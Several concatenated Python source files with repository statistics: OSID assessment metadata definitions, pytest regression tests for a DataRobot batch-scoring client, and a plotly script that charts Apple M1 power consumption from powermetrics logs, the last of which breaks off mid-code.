'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'items_shuffled': {
'element_label': {
'text': 'items shuffled',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'enter either true or false.',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_boolean_values': [None],
'syntax': 'BOOLEAN',
},
'score_system': {
'element_label': {
'text': 'score system',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'deadline': {
'element_label': {
'text': 'deadline',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'enter a valid datetime object.',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_date_time_values': [None],
'syntax': 'DATETIME',
'date_time_set': [],
},
'duration': {
'element_label': {
'text': 'duration',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'enter a valid duration object.',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_duration_values': [None],
'syntax': 'DURATION',
'date_time_set': [],
},
'assessment': {
'element_label': {
'text': 'assessment',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'items_sequential': {
'element_label': {
'text': 'items sequential',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'enter either true or false.',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_boolean_values': [None],
'syntax': 'BOOLEAN',
},
}
def get_assessment_taken_mdata():
"""Return default mdata map for AssessmentTaken"""
return {
'assessment_offered': {
'element_label': {
'text': 'assessment offered',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'taker': {
'element_label': {
'text': 'taker',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
}
def get_assessment_section_mdata():
"""Return default mdata map for AssessmentSection"""
return {
'assessment_taken': {
'element_label': {
'text': 'assessment taken',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
}
def get_bank_mdata():
"""Return default mdata map for Bank"""
return {
}
| 35.563107
| 73
| 0.487374
| 1,165
| 14,652
| 5.84206
| 0.067811
| 0.149868
| 0.097708
| 0.159859
| 0.863503
| 0.852483
| 0.818396
| 0.818396
| 0.818396
| 0.818396
| 0
| 0
| 0.383497
| 14,652
| 411
| 74
| 35.649635
| 0.75346
| 0.025799
| 0
| 0.727273
| 0
| 0
| 0.265462
| 0.008083
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020779
| false
| 0
| 0.005195
| 0
| 0.046753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84c17ff999ec9c56a9884aa2a89e3c727c39ccec
| 11,119
|
py
|
Python
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 30
|
2016-03-03T10:29:15.000Z
|
2020-06-03T21:43:11.000Z
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 164
|
2016-03-03T12:31:22.000Z
|
2020-09-08T13:18:39.000Z
|
tests/test_regression.py
|
satvidh/batch-scoring
|
13da21e813da3e757526b9c51f7dd1fe2b224603
|
[
"BSD-3-Clause"
] | 18
|
2016-05-12T13:50:05.000Z
|
2021-06-30T19:42:09.000Z
|
import pytest
from datarobot_batch_scoring.batch_scoring import run_batch_predictions
from utils import PickableMock
from utils import read_logs
def test_regression(live_server, tmpdir, ui, keep_cols=None,
in_fixture='tests/fixtures/regression_predict.csv',
out_fixture='tests/fixtures/regression_output.csv',
fast_mode=False, skip_row_id=False, output_delimiter=None,
skip_dialect=False,
n_samples=500,
max_batch_size=None,
expected_ret=None):
# train one model in project
out = tmpdir.join('out.csv')
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93e',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=n_samples,
out_file=str(out),
keep_cols=keep_cols,
delimiter=None,
dataset=in_fixture,
pred_name=None,
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=fast_mode,
dry_run=False,
encoding='',
skip_dialect=skip_dialect,
skip_row_id=skip_row_id,
output_delimiter=output_delimiter,
max_batch_size=max_batch_size
)
assert ret is expected_ret
if out_fixture:
actual = out.read_text('utf-8')
with open(out_fixture, 'rU') as f:
expected = f.read()
print(len(actual), len(expected))
assert actual == expected
def test_regression_rename(live_server, tmpdir):
# train one model in project
out = tmpdir.join('out.csv')
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93e',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file=str(out),
keep_cols=None,
delimiter=None,
dataset='tests/fixtures/regression_predict.csv',
pred_name='new_name',
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=False,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
actual = out.read_text('utf-8')
with open('tests/fixtures/regression_output_rename.csv', 'rU') as f:
assert actual == f.read()
def test_regression_rename_fast(live_server, tmpdir):
# train one model in project
out = tmpdir.join('out.csv')
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93e',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=10,
out_file=str(out),
keep_cols=None,
delimiter=None,
dataset='tests/fixtures/regression_predict.csv',
pred_name='new_name',
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=True,
dry_run=False,
encoding='',
skip_dialect=False
)
assert ret is None
actual = out.read_text('utf-8')
with open('tests/fixtures/regression_output_rename.csv', 'rU') as f:
assert actual == f.read()
def check_regression_jp(live_server, tmpdir, fast_mode, gzipped):
"""Use utf8 encoded input data.
"""
if fast_mode:
out_fname = 'out_fast.csv'
else:
out_fname = 'out.csv'
out = tmpdir.join(out_fname)
dataset_suffix = '.gz' if gzipped else ''
ui = PickableMock()
base_url = '{webhost}/predApi/v1.0/'.format(webhost=live_server.url())
ret = run_batch_predictions(
base_url=base_url,
base_headers={},
user='username',
pwd='password',
api_token=None,
create_api_token=False,
pid='56dd9570018e213242dfa93c',
lid='56dd9570018e213242dfa93e',
import_id=None,
n_retry=3,
concurrent=1,
resume=False,
n_samples=500,
out_file=str(out),
keep_cols=None,
delimiter=None,
dataset='tests/fixtures/regression_jp.csv' + dataset_suffix,
pred_name='new_name',
timeout=None,
ui=ui,
auto_sample=False,
fast_mode=fast_mode,
dry_run=False,
encoding='',
skip_dialect=False,
compression=True
)
assert ret is None
actual = out.read_text('utf-8')
with open('tests/fixtures/regression_output_jp.csv', 'rU') as f:
assert actual == f.read()
def test_fast_mode_regression_jp(live_server, tmpdir):
check_regression_jp(live_server, tmpdir, True, False)
def test_wo_fast_mode_regression_jp(live_server, tmpdir):
check_regression_jp(live_server, tmpdir, False, False)
def test_fast_mode_gzipped_regression_jp(live_server, tmpdir):
check_regression_jp(live_server, tmpdir, True, True)
def test_wo_fast_mode_gzipped_regression_jp(live_server, tmpdir):
check_regression_jp(live_server, tmpdir, False, True)
def test_regression_keep_cols(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_x.csv')
def test_regression_keep_cols_multi(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx.csv')
def test_regression_keep_cols_fast(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_x.csv',
fast_mode=True)
def test_regression_keep_cols_multi_fast(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx.csv',
fast_mode=True)
def test_regression_keep_cols_multi_fast_max_batch(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx.csv',
fast_mode=True,
max_batch_size=100)
logs = read_logs()
assert "bytes, splitting" in logs
def test_regression_bad_csv(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui,
in_fixture='tests/fixtures/regression_bad.csv',
out_fixture=None,
fast_mode=False,
expected_ret=1)
logs = read_logs()
assert "Error parsing CSV file after line 1000, error: " in logs
def test_regression_bad2_csv(live_server, tmpdir, monkeypatch, ui):
def sys_exit(code):
raise RuntimeError
monkeypatch.setattr("sys.exit", sys_exit)
with pytest.raises(RuntimeError):
test_regression(live_server, tmpdir, ui,
in_fixture='tests/fixtures/regression_bad2.csv',
out_fixture=None,
fast_mode=True,
expected_ret=1)
def test_regression_keep_cols_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_x_rid.csv',
skip_row_id=True)
def test_regression_keep_cols_multi_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx_rid.csv',
skip_row_id=True)
def test_regression_keep_cols_fast_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_x_rid.csv',
fast_mode=True,
skip_row_id=True)
def test_regression_keep_cols_multi_fast_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx_rid.csv',
fast_mode=True,
skip_row_id=True)
def test_regression_fast_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui,
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_rid.csv',
fast_mode=True,
skip_row_id=True)
def test_regression_wo_row_id(live_server, tmpdir, ui):
test_regression(live_server, tmpdir, ui,
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_rid.csv',
fast_mode=False,
skip_row_id=True)
def test_regression_keep_cols_multi_output(live_server, tmpdir, ui):
test_regression(
live_server, tmpdir, ui, keep_cols=['y', 'x'],
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx_output.csv',
output_delimiter='|')
def test_regression_keep_cols_multi_output_skip_dialect(live_server,
tmpdir, ui):
test_regression(
live_server, tmpdir, ui, keep_cols=['y', 'x'],
skip_dialect=True,
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx_output.csv',
output_delimiter='|')
def test_regression_keep_cols_multi_skip_dialect(live_server, tmpdir, ui):
test_regression(
live_server, tmpdir, ui, keep_cols=['y', 'x'],
skip_dialect=True,
in_fixture='tests/fixtures/regression.csv',
out_fixture='tests/fixtures/regression_output_yx.csv')
| 32.89645
| 78
| 0.627484
| 1,350
| 11,119
| 4.845185
| 0.102963
| 0.073383
| 0.107629
| 0.08806
| 0.849106
| 0.829537
| 0.800795
| 0.787189
| 0.77664
| 0.77664
| 0
| 0.021951
| 0.270708
| 11,119
| 337
| 79
| 32.994065
| 0.784684
| 0.010433
| 0
| 0.716418
| 0
| 0
| 0.171623
| 0.148704
| 0
| 0
| 0
| 0
| 0.037313
| 1
| 0.093284
| false
| 0.014925
| 0.029851
| 0
| 0.123134
| 0.003731
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca03895a92271b94a3bef78a065c4c5459a61372
| 49
|
py
|
Python
|
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
from .model import CAC
from .model_vid import VCL
| 24.5
| 26
| 0.816327
| 9
| 49
| 4.333333
| 0.666667
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 2
| 26
| 24.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ca450182bb7a34f853d42534c6701c35ca42fbda
| 76,697
|
py
|
Python
|
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
#!./bin/python3
import os
import subprocess
import re
import csv
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly.io as pio
import pandas as pd
import numpy as np
import time
import plotly.figure_factory as ff
from PIL import Image
def regexParse(content, videoType):
# Declare local dataframes
dfPower, dfFrequency, dfUsage = pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
# Regex findall returns matches which are all strings
# Used list(map(int, regexMatches))) to convert the list of strings to a list of int or float so that in Excel it's an integer
dfPower['Efficiency Cluster'] = pd.Series(map(int, re.findall(r'E-Cluster Power:\s*([\d.]+)\s*mW', content)))
dfFrequency['Efficiency Cluster'] = pd.Series(map(int, re.findall(r'E-Cluster HW active frequency:\s*([\d.]+)\s*MHz', content)))
dfUsage['Efficiency Cluster'] = pd.Series(map(float, re.findall(r'E-Cluster HW active residency:\s*([\d.]+)%', content)))
dfPower['Performance Cluster'] = pd.Series(map(int, re.findall(r'P-Cluster Power:\s*([\d.]+)\s*mW', content)))
dfFrequency['Performance Cluster'] = pd.Series(map(int, re.findall(r'P-Cluster HW active frequency:\s*([\d.]+)\s*MHz', content)))
dfUsage['Performance Cluster'] = pd.Series(map(float, re.findall(r'P-Cluster HW active residency:\s*([\d.]+)%', content)))
dfPower['DRAM'] = pd.Series(map(int, re.findall(r'DRAM Power:\s*([\d.]+)\s*mW', content)))
dfPower['Cluster'] = pd.Series(map(int, re.findall(r'Clusters Total Power:\s*([\d.]+)\s*mW', content)))
dfPower['Package'] = pd.Series(map(int, re.findall(r'Package Power:\s*([\d.]+)\s*mW', content)))
dfPower['GPU'] = pd.Series(map(int, re.findall(r'GPU Power:\s*([\d.]+)\s*mW\nPackage Power', content)))
dfFrequency['GPU'] = pd.Series(map(int, re.findall(r'GPU active frequency:\s*([\d.]+)\s*MHz', content)))
dfUsage['GPU'] = pd.Series(map(float, re.findall(r'GPU active residency:\s*([\d.]+)%', content)))
# Other components power needs to be extracted out of total package power
# e.g. result from logs
# DRAM Power: 14 mW
# Clusters Total Power: 30 mW
# GPU Power: 14 mW
# Package Power: 99 mW
dfPower['Other'] = dfPower['Package'] - (dfPower['Cluster'] + dfPower['DRAM'] + dfPower['GPU'])
# Check if the number of datapoints from all videos are equal
if((len(dfPower) != len(dfFrequency)) or (len(dfPower) != len(dfUsage)) or (len(dfUsage) != len(dfFrequency))):
print("The lengths of the dataframes are not equal. Check the regexes.")
else:
dataPoints = len(dfPower)
dfPower['time'] = dfFrequency['time'] = dfUsage['time'] = list(range(1, dataPoints + 1))
dfPower['Video Type'] = dfFrequency['Video Type'] = dfUsage['Video Type'] = [videoType] * dataPoints
return dfPower, dfFrequency, dfUsage
def buildVLCCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
fig = px.area(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9-TEST", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Package'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", facet_col_wrap = 5,
labels={"value": "Power Consumption (mW)", "time": "Time (s)"}, color_discrete_map={"Package": "#57FFBC"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_layout(autosize = True, hovermode="x",
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Total Package Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.79, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.17,
sizex=0.2, sizey=0.2,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-power-package.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-package.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark',
width = 700, height = 1000, facet_row='Video Type', line_shape= "spline", render_mode = "svg",
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.sequential.YlOrRd,
# color_discrete_map={
# "Efficiency Cluster": "#AA0EFE",
# "Performance Cluster": "#1CBE50",
# "DRAM": "#57FFBC",
# "GPU": "#2ED9FF",
# # "Other": "rgb(95, 70, 144)"
# "Other": "#FBE426"
# },
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels = {"value": "Power Consumption (mW)", "time": "Time (s)"},
category_orders = {"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
# print(annotation)
annotation['textangle'] = 0
annotation['xanchor'] = 'right'
annotation['x'] = annotation['x'] - 0.002
annotation['y'] = annotation['y'] + 0.038
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=13)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
# fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_traces(hovertemplate='%{y} (mW)')
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.97,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'left', yanchor = 'top',
x=0.01, y=0.965, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.119, y=1.038,
sizex=0.065, sizey=0.065,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-total.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'],
width = 700, height = 1000, facet_row='Video Type', render_mode = "svg")
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total-2.html", include_plotlyjs="cdn")
# BAR CHART FOR Averages by component
# Pull out only the non-browser video types
barDf = (dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
# Now use the filtered columns to create the bar chart
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 400, barmode = 'group',
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0"
},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), title_font_color = "#707070", color="#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424') #, range=[0, 1100])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.93,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['DRAM'], barDf['GPU'], barDf['Other']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
# fig.update_traces(texttemplate='%{text:.2s}', textposition='outside')
# fig.update_layout(uniformtext_minsize=7, uniformtext_mode='hide')
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.12,
sizex=0.145, sizey=0.145,
xanchor="left", yanchor="bottom"
)
)
# Update just the layout properites with relatout method e.g. barmode
# fig.update_layout(
# updatemenus=[
# dict(
# type="buttons",
# buttons=[
# dict(label="Grouped",
# method="relayout",
# args = [{"barmode": "group"} ]),
# dict(label="Stacked",
# method="relayout",
# args = [{"barmode": "stack"}, {"autosize": "True"} ])
# ]
# )
# ]
# )
# TODO: Figure out the fix for https://github.com/plotly/plotly.py/issues/3120
# Update the Layout + Trace properties
# fig.update_layout(
# updatemenus=[
# dict(
# type="dropdown",
# # direction="right",
# active=0,
# x=1.035,
# y=1.27,
# showactive = True,
# buttons=list([
# dict(label="Grouped",
# method="update",
# args=[{"width": [0.11]},
# {"barmode": "group"}]),
# dict(label="Stacked",
# method="update",
# args=[{"width": [0.6]},
# {"barmode": "stack"}])
# ]),
# bgcolor = "#222",
